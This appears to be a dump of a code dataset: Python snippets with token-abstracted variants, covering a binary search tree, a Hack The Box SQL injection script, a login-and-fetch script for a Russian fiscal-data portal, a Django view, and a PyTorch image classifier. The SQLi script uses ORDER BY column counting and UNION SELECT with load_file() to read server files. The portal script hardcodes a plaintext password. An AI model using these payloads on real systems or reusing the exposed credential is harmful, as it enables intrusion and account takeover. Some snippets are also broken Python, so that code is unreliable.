temp.data, parent)\n return root\n\n def successor(self, root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n <function token>\n\n\n<function token>\n<code token>\n", "<class token>\n\n\nclass tree(object):\n <function token>\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n\n def successor(self, root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n <function token>\n\n\n<function token>\n<code token>\n", "<class token>\n\n\nclass 
tree(object):\n <function token>\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n <function token>\n <function token>\n\n\n<function token>\n<code token>\n", "<class token>\n\n\nclass tree(object):\n <function token>\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<code token>\n", "<class token>\n\n\nclass tree(object):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<code token>\n", "<class token>\n<class token>\n<function token>\n<code token>\n" ]
false
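A quick sanity check for the binary search tree record above: an in-order traversal must remain sorted no matter which values are inserted or deleted. This sketch assumes the record's tree class is in scope; inorder_list and check_bst are illustrative helpers, and the guard skips the one case (a root with fewer than two children) that the record's parent-based delete() cannot handle:

```python
import random

def inorder_list(node, out):
    # Collect the in-order traversal into a list instead of printing it,
    # so the result can be compared against sorted order.
    if node is not None:
        inorder_list(node.left, out)
        out.append(node.data)
        inorder_list(node.right, out)
    return out

def check_bst(trials=100):
    for _ in range(trials):
        values = random.sample(range(1000), 20)
        t = tree()  # tree/Node classes from the record above
        for v in values:
            t.insert(t.root, v)
        for v in random.sample(values, 5):
            if v == t.root.data and (t.root.left is None or t.root.right is None):
                continue  # delete() needs a parent except for a two-child root
            t.delete(t.root, v, None)
        out = inorder_list(t.root, [])
        assert out == sorted(out), out

check_bst()
```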
82
88ec9484e934ce27b13734ca26f79df71b7677e6
import requests
from bs4 import BeautifulSoup
import sys
import re

if len(sys.argv) < 2:
    print("Syntax : python %s <port>" % str(sys.argv[0]))
else:
    print('-' * 55)
    print("HTB WEB-CHALLENGE coded by ZyperX [Freelance]")
    print('-' * 55)
    r = requests.session()
    port = str(sys.argv[1])
    url = "http://docker.hackthebox.eu:" + port
    uri = "/portfolio.php?id=1"
    url = url + uri
    print("[*]SQLi Affected URI : %s" % uri)
    print("[*]Counting Columns")
    for x in range(1, 20):
        payload = " order by %i --+" % x
        nurl = url + payload
        op = r.get(nurl)
        soup = BeautifulSoup(op.text, 'html.parser')
        # word count of the first <p> tag; the error page is much shorter
        soup = str(soup.find('p'))
        size = len(soup.split())
        print("[*]Page size at order by %s : %s" % (x, size))
        if size < 36:
            col = x - 1
            break
    print("-" * 55)
    print("[*]Number of Columns : %d" % col)
    print("[*]Web App Vulnerable with FILE PRIVILEGE SQLI")
    print("[*]Trying to read content of '/var/www/html/administrat/panel.php'")
    upayload = " union all select 1"
    for x in range(2, col + 1):
        upayload = upayload + "," + str(x)
    upayload = upayload + " --+"
    url = url + upayload
    print("[*]Executing : %s" % url)
    op = r.get(url)
    op = str(op.text)
    if "2" in op:
        print("[*]Column 2 is reflected")
        print("[*]Injecting payloads in column 2....")
    upayload = upayload.replace('2', "load_file('/var/www/html/administrat/panel.php')")
    url = "http://docker.hackthebox.eu:" + port + uri + upayload
    print("[*]Executing : %s" % url)
    op = r.get(url)
    op = str(op.text)
    op = re.search("HTB.*?<", op)
    op = str(op.group())
    op = op.replace('<', '')
    print("-" * 55)
    print("[*]Flag : %s" % op)
[ "import requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nif len(sys.argv)<2:\n print(\"Syntax : python %s <port>\")%(str(sys.argv[0]))\nelse:\n print('-'*55)\n print(\"HTB WEB-CHALLENGE coded by ZyperX [Freelance]\")\n print('-'*55)\n r=requests.session()\n port=str(sys.argv[1])\n url=\"http://docker.hackthebox.eu:\"\n url=url+port\n uri=\"/portfolio.php?id=1\"\n url=url+uri\n print(\"[*]SQLi Affected URI : %s\")%(uri)\n print(\"[*]Counting Columns\")\n for x in range(1,20):\n payload=(\" order by %i --+\")%(x)\n nurl=url+payload\n op=r.get(nurl)\n soup=BeautifulSoup(op.text,'html.parser')\n soup=soup.find('p')\n soup=str(soup)\n size=len(soup.split())\n print(\"[*]Page size at order by %s : %s\")%(x,size)\n if size < 36 :\n col= x-1\n break \n print(\"-\"*55)\n print(\"[*]Number of Columns : %d\")%(col)\n print(\"[*]Web App Vulnerable with FILE PRIVILEGE SQLI\")\n print(\"[*]Trying to read content of \\'/var/www/html/administrat/panel.php\\'\")\n upayload=\" union all select 1\"\n for x in range(2,col+1):\n x=str(x)\n upayload=upayload+\",\"+x\nupayload=upayload+\" --+\"\nurl=url+upayload\nprint(\"[*]Executing. : %s\")%(url)\nop=r.get(url)\nop=str(op.text)\nif op.find(\"2\"):\n print(\"[*]Column 2 is reflected\");\n print(\"[*]Injecting payloads in column 2....\");\nupayload=upayload.replace('2','load_file(\\'/var/www/html/administrat/panel.php\\')')\nurl=\"http://docker.hackthebox.eu:\"+port+uri+upayload\nprint(\"[*]Excecuting : %s\")%(url)\nop=r.get(url)\nop=str(op.text)\nop=re.search(\"HTB.*?<\",op)\nop=str(op.group())\nop=op.replace('<','')\nprint(\"-\"*55)\nprint(\"[*]Flag : %s\")%(op)\n", "import requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\nupayload = upayload + ' --+'\nurl = url + upayload\nprint('[*]Executing. 
: %s') % url\nop = r.get(url)\nop = str(op.text)\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\nupayload = upayload.replace('2',\n \"load_file('/var/www/html/administrat/panel.php')\")\nurl = 'http://docker.hackthebox.eu:' + port + uri + upayload\nprint('[*]Excecuting : %s') % url\nop = r.get(url)\nop = str(op.text)\nop = re.search('HTB.*?<', op)\nop = str(op.group())\nop = op.replace('<', '')\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n", "<import token>\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\nupayload = upayload + ' --+'\nurl = url + upayload\nprint('[*]Executing. : %s') % url\nop = r.get(url)\nop = str(op.text)\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\nupayload = upayload.replace('2',\n \"load_file('/var/www/html/administrat/panel.php')\")\nurl = 'http://docker.hackthebox.eu:' + port + uri + upayload\nprint('[*]Excecuting : %s') % url\nop = r.get(url)\nop = str(op.text)\nop = re.search('HTB.*?<', op)\nop = str(op.group())\nop = op.replace('<', '')\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n", "<import token>\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\n<assignment token>\nprint('[*]Executing. 
: %s') % url\n<assignment token>\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\n<assignment token>\nprint('[*]Excecuting : %s') % url\n<assignment token>\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n", "<import token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
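A minimal Python 3 sketch of the ORDER BY column-counting step used in the record above, assuming a placeholder target URL and the same 36-word page-size threshold; the original's Python 2 "print(...) % (...)" idiom is replaced with f-strings.

import requests
from bs4 import BeautifulSoup

def count_columns(base_url, max_cols=20, min_words=36):
    # Append "order by N"; once N exceeds the real column count the query
    # fails and the rendered page shrinks below the baseline word count.
    session = requests.Session()
    for n in range(1, max_cols + 1):
        page = session.get(f"{base_url} order by {n} --+")
        paragraph = str(BeautifulSoup(page.text, 'html.parser').find('p'))
        if len(paragraph.split()) < min_words:
            return n - 1
    return max_cols

# Hypothetical usage (path copied from the record, port is a placeholder):
# cols = count_columns('http://docker.hackthebox.eu:31337/portfolio.php?id=1')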
83
cd2e03666a890d6e9ea0fcb45fe28510d684916d
import requests


def squeezed(client_name):
    # Collapse the long Russian legal form "Индивидуальный предприниматель"
    # ("individual entrepreneur") to its abbreviation "ИП" so names fit the report.
    return client_name.replace('Индивидуальный предприниматель', 'ИП')


def get_kkm_filled_fn(max_fill=80):
    """Return the list of cash registers (KKM) whose fiscal storage (FN)
    is at least max_fill percent full."""
    LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'
    API_URL = 'https://pk.platformaofd.ru/api/monitoring'

    session = requests.Session()
    print('-= connecting to the server =-')
    session.get(LOGIN_URL)  # prime the session cookies before logging in

    login_data = {
        'email': '[email protected]',
        'password': 'smart620514',
        'username': '[email protected]',
        'phone': ''}

    print('-= logging in =-')
    session.post(LOGIN_URL, data=login_data)

    # Request all KKM except archived ones (the Content-Type header is required!)
    headers = {'Content-Type': 'application/json;charset=UTF-8'}
    payload = '{"badgeId":17,"type":"terminal","filterValues":[],"withArchive":0}'
    print('-= fetching data from the server =-')
    r = session.post(API_URL, data=payload, headers=headers)

    data_from_api = r.json()
    all_kkm_list = data_from_api['result']['data']

    print('-= processing data =-')
    kkm_with_filled_fn = []
    for kkm in all_kkm_list:
        # 'fnSpaceUsed' arrives as a string like "'83%'"; strip quotes and the percent sign.
        fn_used = int(kkm['fnSpaceUsed'].strip("'%"))
        if fn_used >= max_fill:
            kkm_with_filled_fn.append(kkm)
    return kkm_with_filled_fn


max_fill = 80
x = get_kkm_filled_fn(max_fill)
print(f'KKM with FN fill level above {max_fill}%.')
for k in x:
    print(f"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}")
[ "import requests\n\ndef squeezed (client_name):\n return client_name.replace('Индивидуальный предприниматель', 'ИП')\n\ndef get_kkm_filled_fn(max_fill=80):\n## возвращает список ККМ с заполнением ФН больше max_fill в %\n LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'\n API_URL = 'https://pk.platformaofd.ru/api/monitoring'\n\n session = requests.Session()\n print('-= подключение к серверу =-')\n session.get(LOGIN_URL)\n\n login_data = {\n 'email': '[email protected]',\n 'password': 'smart620514',\n 'username': '[email protected]',\n 'phone':''}\n\n print('-= авторизация =-')\n session.post(LOGIN_URL, data=login_data)\n\n # запрос всех ККМ, кроме архивных (headers обязательно !)\n headers = {'Content-Type': 'application/json;charset=UTF-8'}\n payload = '{\"badgeId\":17,\"type\":\"terminal\",\"filterValues\":[],\"withArchive\":0}'\n print('-= получение данных с сервера =-')\n r = session.post (API_URL, data=payload, headers=headers)\n\n data_from_api = r.json()\n all_kkm_list = data_from_api['result']['data']\n kkm_quanity = len(all_kkm_list)\n\n print('-= обработка данных =-')\n kkm_with_filled_fn = []\n for kkm in all_kkm_list:\n fn_used = int(kkm['fnSpaceUsed'].strip(\"'%\"))\n if fn_used >= max_fill:\n kkm_with_filled_fn.append(kkm)\n return kkm_with_filled_fn\n\n\nmax_fill = 80\nx = get_kkm_filled_fn(max_fill)\nprint(f'ККМ с заполненностью ФН выше {max_fill}%.')\nfor k in x:\n print(f\"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}\")\n\n", "import requests\n\n\ndef squeezed(client_name):\n return client_name.replace('Индивидуальный предприниматель', 'ИП')\n\n\ndef get_kkm_filled_fn(max_fill=80):\n LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'\n API_URL = 'https://pk.platformaofd.ru/api/monitoring'\n session = requests.Session()\n print('-= подключение к серверу =-')\n session.get(LOGIN_URL)\n login_data = {'email': '[email protected]', 'password': 'smart620514',\n 'username': '[email protected]', 'phone': ''}\n print('-= авторизация =-')\n session.post(LOGIN_URL, data=login_data)\n headers = {'Content-Type': 'application/json;charset=UTF-8'}\n payload = (\n '{\"badgeId\":17,\"type\":\"terminal\",\"filterValues\":[],\"withArchive\":0}')\n print('-= получение данных с сервера =-')\n r = session.post(API_URL, data=payload, headers=headers)\n data_from_api = r.json()\n all_kkm_list = data_from_api['result']['data']\n kkm_quanity = len(all_kkm_list)\n print('-= обработка данных =-')\n kkm_with_filled_fn = []\n for kkm in all_kkm_list:\n fn_used = int(kkm['fnSpaceUsed'].strip(\"'%\"))\n if fn_used >= max_fill:\n kkm_with_filled_fn.append(kkm)\n return kkm_with_filled_fn\n\n\nmax_fill = 80\nx = get_kkm_filled_fn(max_fill)\nprint(f'ККМ с заполненностью ФН выше {max_fill}%.')\nfor k in x:\n print(\n f\"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}\"\n )\n", "<import token>\n\n\ndef squeezed(client_name):\n return client_name.replace('Индивидуальный предприниматель', 'ИП')\n\n\ndef get_kkm_filled_fn(max_fill=80):\n LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'\n API_URL = 'https://pk.platformaofd.ru/api/monitoring'\n session = requests.Session()\n print('-= подключение к серверу =-')\n session.get(LOGIN_URL)\n login_data = {'email': '[email protected]', 'password': 'smart620514',\n 'username': '[email protected]', 'phone': ''}\n print('-= авторизация =-')\n session.post(LOGIN_URL, data=login_data)\n headers = {'Content-Type': 'application/json;charset=UTF-8'}\n payload = (\n 
'{\"badgeId\":17,\"type\":\"terminal\",\"filterValues\":[],\"withArchive\":0}')\n print('-= получение данных с сервера =-')\n r = session.post(API_URL, data=payload, headers=headers)\n data_from_api = r.json()\n all_kkm_list = data_from_api['result']['data']\n kkm_quanity = len(all_kkm_list)\n print('-= обработка данных =-')\n kkm_with_filled_fn = []\n for kkm in all_kkm_list:\n fn_used = int(kkm['fnSpaceUsed'].strip(\"'%\"))\n if fn_used >= max_fill:\n kkm_with_filled_fn.append(kkm)\n return kkm_with_filled_fn\n\n\nmax_fill = 80\nx = get_kkm_filled_fn(max_fill)\nprint(f'ККМ с заполненностью ФН выше {max_fill}%.')\nfor k in x:\n print(\n f\"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}\"\n )\n", "<import token>\n\n\ndef squeezed(client_name):\n return client_name.replace('Индивидуальный предприниматель', 'ИП')\n\n\ndef get_kkm_filled_fn(max_fill=80):\n LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'\n API_URL = 'https://pk.platformaofd.ru/api/monitoring'\n session = requests.Session()\n print('-= подключение к серверу =-')\n session.get(LOGIN_URL)\n login_data = {'email': '[email protected]', 'password': 'smart620514',\n 'username': '[email protected]', 'phone': ''}\n print('-= авторизация =-')\n session.post(LOGIN_URL, data=login_data)\n headers = {'Content-Type': 'application/json;charset=UTF-8'}\n payload = (\n '{\"badgeId\":17,\"type\":\"terminal\",\"filterValues\":[],\"withArchive\":0}')\n print('-= получение данных с сервера =-')\n r = session.post(API_URL, data=payload, headers=headers)\n data_from_api = r.json()\n all_kkm_list = data_from_api['result']['data']\n kkm_quanity = len(all_kkm_list)\n print('-= обработка данных =-')\n kkm_with_filled_fn = []\n for kkm in all_kkm_list:\n fn_used = int(kkm['fnSpaceUsed'].strip(\"'%\"))\n if fn_used >= max_fill:\n kkm_with_filled_fn.append(kkm)\n return kkm_with_filled_fn\n\n\n<assignment token>\nprint(f'ККМ с заполненностью ФН выше {max_fill}%.')\nfor k in x:\n print(\n f\"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}\"\n )\n", "<import token>\n\n\ndef squeezed(client_name):\n return client_name.replace('Индивидуальный предприниматель', 'ИП')\n\n\ndef get_kkm_filled_fn(max_fill=80):\n LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'\n API_URL = 'https://pk.platformaofd.ru/api/monitoring'\n session = requests.Session()\n print('-= подключение к серверу =-')\n session.get(LOGIN_URL)\n login_data = {'email': '[email protected]', 'password': 'smart620514',\n 'username': '[email protected]', 'phone': ''}\n print('-= авторизация =-')\n session.post(LOGIN_URL, data=login_data)\n headers = {'Content-Type': 'application/json;charset=UTF-8'}\n payload = (\n '{\"badgeId\":17,\"type\":\"terminal\",\"filterValues\":[],\"withArchive\":0}')\n print('-= получение данных с сервера =-')\n r = session.post(API_URL, data=payload, headers=headers)\n data_from_api = r.json()\n all_kkm_list = data_from_api['result']['data']\n kkm_quanity = len(all_kkm_list)\n print('-= обработка данных =-')\n kkm_with_filled_fn = []\n for kkm in all_kkm_list:\n fn_used = int(kkm['fnSpaceUsed'].strip(\"'%\"))\n if fn_used >= max_fill:\n kkm_with_filled_fn.append(kkm)\n return kkm_with_filled_fn\n\n\n<assignment token>\n<code token>\n", "<import token>\n<function token>\n\n\ndef get_kkm_filled_fn(max_fill=80):\n LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'\n API_URL = 'https://pk.platformaofd.ru/api/monitoring'\n session = requests.Session()\n print('-= подключение к серверу =-')\n 
session.get(LOGIN_URL)\n login_data = {'email': '[email protected]', 'password': 'smart620514',\n 'username': '[email protected]', 'phone': ''}\n print('-= авторизация =-')\n session.post(LOGIN_URL, data=login_data)\n headers = {'Content-Type': 'application/json;charset=UTF-8'}\n payload = (\n '{\"badgeId\":17,\"type\":\"terminal\",\"filterValues\":[],\"withArchive\":0}')\n print('-= получение данных с сервера =-')\n r = session.post(API_URL, data=payload, headers=headers)\n data_from_api = r.json()\n all_kkm_list = data_from_api['result']['data']\n kkm_quanity = len(all_kkm_list)\n print('-= обработка данных =-')\n kkm_with_filled_fn = []\n for kkm in all_kkm_list:\n fn_used = int(kkm['fnSpaceUsed'].strip(\"'%\"))\n if fn_used >= max_fill:\n kkm_with_filled_fn.append(kkm)\n return kkm_with_filled_fn\n\n\n<assignment token>\n<code token>\n", "<import token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n" ]
false
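A sketch of the same login-then-query flow as the record above, building the JSON payload with json.dumps instead of a hand-written string; the URLs, form fields, and payload keys are copied from the script, the credentials are placeholders, and the response shape is assumed to match.

import json
import requests

LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'
API_URL = 'https://pk.platformaofd.ru/api/monitoring'

def fetch_terminals(email, password):
    session = requests.Session()
    session.get(LOGIN_URL)  # prime session cookies before authenticating
    session.post(LOGIN_URL, data={'email': email, 'password': password,
                                  'username': email, 'phone': ''})
    payload = {'badgeId': 17, 'type': 'terminal',
               'filterValues': [], 'withArchive': 0}
    r = session.post(API_URL, data=json.dumps(payload),
                     headers={'Content-Type': 'application/json;charset=UTF-8'})
    return r.json()['result']['data']

# terminals = fetch_terminals('user@example.com', 'placeholder-password')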
84
709f2425bc6e0b0b650fd6c657df6d85cfbd05fe
from django.shortcuts import render


def test_petite_vue(request):
    """Render the petite-vue test form page."""
    return render(request, 'petite_vue_app/test-form.html')
[ "from django.shortcuts import render\n\n# Create your views here.\ndef test_petite_vue(request):\n return render(request, 'petite_vue_app/test-form.html')\n", "from django.shortcuts import render\n\n\ndef test_petite_vue(request):\n return render(request, 'petite_vue_app/test-form.html')\n", "<import token>\n\n\ndef test_petite_vue(request):\n return render(request, 'petite_vue_app/test-form.html')\n", "<import token>\n<function token>\n" ]
false
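To serve the view in the record above, a urls.py along these lines would be needed; the route string, URL name, and app module path are assumptions, and only test_petite_vue comes from the record.

from django.urls import path
from petite_vue_app import views

urlpatterns = [
    path('test-form/', views.test_petite_vue, name='test_petite_vue'),
]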
85
a4deb67d277538e61c32381da0fe4886016dae33
import torch
import torch.nn as nn
import imageio
import pandas as pd
import glob, os

fileDir = os.getcwd()
# os.chdir("./train-jpg")  # run from the directory that holds the training jpgs

# The full set has 40480 training examples; the full split would allocate
# 39000 for training and the remaining 1480 for validation.

input_size = 65536  # 256^2 grayscale pixels, flattened
hidden_size = 20
hidden_size_1 = 15
hidden_size_2 = 10
hidden_size_3 = 5
num_classes = 1
learning_rate = 0.001
num_epochs = 5

train_num = 1000
test_num = 148
# train_num = 39000
# test_num = 1480

# %% Load data -- clouds vs. non-clouds
images = []
for file in glob.glob("*.jpg"):
    images.append(file)
# String slicing on the "train_N.jpg" filenames so the images sort in numeric order.
images = sorted(images, key=lambda filename: int(filename[6:-4]))

train_images = []
test_images = []

train_labels = []
test_labels = []
# Labels mark whether an image is free of any kind of cloud or haze.
labels = pd.read_csv("./train_v2.csv")

for i in range(train_num + test_num):
    tags = labels.iloc[i]["tags"]
    if i < train_num:
        train_images.append(imageio.imread(images[i], as_gray=True).flatten())
        train_labels.append(int("cloudy" not in tags and "haze" not in tags))
        # alternative experiment: train_labels.append(int("water" not in tags))
    else:
        test_images.append(imageio.imread(images[i], as_gray=True).flatten())
        test_labels.append(int("cloudy" not in tags and "haze" not in tags))
        # alternative experiment: test_labels.append(int("water" not in tags))


class Net(nn.Module):
    """Five-layer fully connected classifier with sigmoid activations."""

    def __init__(self, input_size, hidden_size, num_classes):
        super(Net, self).__init__()
        self.h1 = nn.Linear(input_size, hidden_size)
        self.h2 = nn.Linear(hidden_size, hidden_size_1)
        self.h3 = nn.Linear(hidden_size_1, hidden_size_2)
        self.h4 = nn.Linear(hidden_size_2, hidden_size_3)
        self.o = nn.Linear(hidden_size_3, num_classes)

    def forward(self, x):
        x = torch.sigmoid(self.h1(x))
        x = torch.sigmoid(self.h2(x))
        x = torch.sigmoid(self.h3(x))
        x = torch.sigmoid(self.h4(x))
        x = torch.sigmoid(self.o(x))
        return x

# %%

model = Net(input_size, hidden_size, num_classes)  # no device configuration here (CPU only)
# Note: SoftMarginLoss expects targets in {-1, +1}; the labels here are {0, 1}.
criterion = nn.SoftMarginLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# To resume training instead, restore the saved weights with
# model.load_state_dict(torch.load('model.ckpt')).

total_step = len(train_images)
for epoch in range(num_epochs):
    for i, image in enumerate(train_images):
        image = torch.Tensor(train_images[i]).reshape(1, 65536)
        label = torch.Tensor([int(train_labels[i])])

        # Forward pass
        outputs = model(image)
        outputs = outputs.squeeze(0)
        loss = criterion(outputs, label)

        # Backward and optimize
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

        if (i + 1) % 100 == 0:
            print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
                  .format(epoch + 1, num_epochs, i + 1, total_step, loss.item()))


# %% Evaluate on the held-out images

with torch.no_grad():
    correct = 0
    for i, image in enumerate(test_images):
        image = torch.Tensor(test_images[i]).reshape(1, 65536)
        label = torch.Tensor([int(test_labels[i])])
        outputs = model(image)
        outputs = outputs.squeeze(0)
        outputs = 1 if torch.sum(outputs) >= 0.5 else 0  # threshold the sigmoid output
        if outputs == torch.sum(label):
            correct += 1
        elif outputs == 0:
            print("#############")
            print(i, outputs, torch.sum(label))

    print('Accuracy of the network on the {} test images: {} %'.format(len(test_images), 100 * correct / len(test_images)))


# %% Save a checkpoint of the trained weights

torch.save(model.state_dict(), 'model.ckpt')

# %%
[ "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport cv2\nimport imageio\nimport pandas as pd\nimport glob, os\nimport numpy as np\n\nfileDir = os.getcwd()\n# os.chdir(\"./train-jpg\")\n\n# there are 40480 training examples\n# we will allocate 39000 for training\n# and the remaining 1480 will be for validation\n\ninput_size = 65536 # 256^2\nhidden_size = 20\nhidden_size_1 = 15\nhidden_size_2 = 10\nhidden_size_3 = 5\nnum_classes = 1\nlearning_rate = 0.001\nnum_epochs = 5\n\ntrain_num = 1000\ntest_num = 148\n\n# train_num = 39000\n# test_num = 1480\n\n# %% Load data--for clouds and non-clouds\nimages = []\n\nfor file in glob.glob(\"*.jpg\"):\n images.append(file)\nimages = sorted(images, key=lambda filename: int(filename[6: -4])) # string splicing so that the images are in order\n\ntrain_images = []\ntest_images = []\n\ntrain_labels = []\ntest_labels = []\nlabels = pd.read_csv(\"./train_v2.csv\") # labels are whether or not image is any sort of cloudy or haze\n\nfor i in range(train_num + test_num):\n tags = labels.iloc[i][\"tags\"]\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int(\"cloudy\" not in tags and \"haze\" not in tags))\n # train_labels.append(int(\"water\" not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int(\"cloudy\" not in tags and \"haze\" not in tags))\n # test_labels.append(int(\"water\" not in tags))\n \nclass Net(nn.Module):\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n \n # parameters\n \n # weights\n # self.h1 = nn.Sigmoid() # input_size, hidden_size\n # self.o = nn.Sigmoid() # hidden_size, num_classes\n\n self.h1 = nn.Linear(input_size, hidden_size) \n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes) \n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n # print(\"doing x: {}\".format(x.shape))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n# %%\n\nmodel 